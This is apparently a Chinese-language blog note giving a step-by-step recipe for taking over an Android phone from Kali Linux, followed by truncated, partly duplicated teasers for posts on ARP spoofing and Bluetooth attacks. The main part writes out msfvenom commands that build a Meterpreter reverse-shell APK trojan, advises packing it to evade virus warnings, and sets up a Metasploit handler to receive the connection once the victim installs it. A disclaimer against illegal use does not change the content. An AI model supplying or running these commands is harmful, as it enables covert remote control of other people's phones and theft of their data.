這裡是做次筆記。
kali入侵安卓手機的方法和其他的博主方法一樣,只是開頭對手機的ip進行設定
首先,我用的靶機是魅藍2,對其網路使用靜態ip:***.***.***.aaa,「x」是需要對應入侵機的ip,「a」則是沒用過的0-255隨便輸
msfvenom -p android/meterpreter/reverse_tcp lhost=你kali的ip lport=5555 r > /root/apk.apk
//這裡是生成木馬病毒apk檔案,當然一般手機都會在安裝時候出現病毒字樣,所以需要你加殼。。
msfconsole
//啟動msfconsole
use exploit/multi/handler
//使用模組
set payload android/meterpreter/reverse_tcp
set lohst 你的ip位址
set lport 5555
//基本設定
run//開始
然後,則需要你的靶機來安裝並執行這個apk.apk了
如圖,如果出現紅色方框內容就說明你成功了
之後你可以使用help命令來獲取幫助。
如果想成功入侵的朋友可以這樣試試,當然,你也可以入侵自己電腦裡的安卓模擬器,那裡不需要設定ip。新人打卡,多多包涵。
請勿用以違法行為!!!
本人寫此部落格是為了記錄和解惑。
kali內網攻擊 arpspoof
arpspoof是一款arp欺騙攻擊工具 檢視物理機ip位址,將kali的ip位址設定為和物理機同一網段。虛擬機器網路介面卡設定為橋接模式 複製物理網路連線狀態 虛擬網路編輯器在管理員模式下啟動後,設定vmnet0為橋接模式,外部鏈結選擇物理機網絡卡。開啟埠 echo 1 proc sys net ...
kali連線藍芽 藍芽攻擊指南(kali)
基本操作 hciconfig 檢視藍芽裝置資訊 hcitool 這是乙個查詢工具。可以用來查詢裝置名稱,裝置id,裝置類別和裝置時鐘。hcidump 可以使用這個來嗅探藍芽通訊 hciconfig hci0 up 啟動藍芽裝置 hciconfig hci0 down 關閉藍芽裝置 service b...
kali連線藍芽 藍芽攻擊指南(kali)
基本操作 hciconfig 檢視藍芽裝置資訊 hcitool 這是乙個查詢工具。可以用來查詢裝置名稱,裝置id,裝置類別和裝置時鐘。hcidump 可以使用這個來嗅探藍芽通訊 hciconfig hci0 up 啟動藍芽裝置 hciconfig hci0 down 關閉藍芽裝置 service b...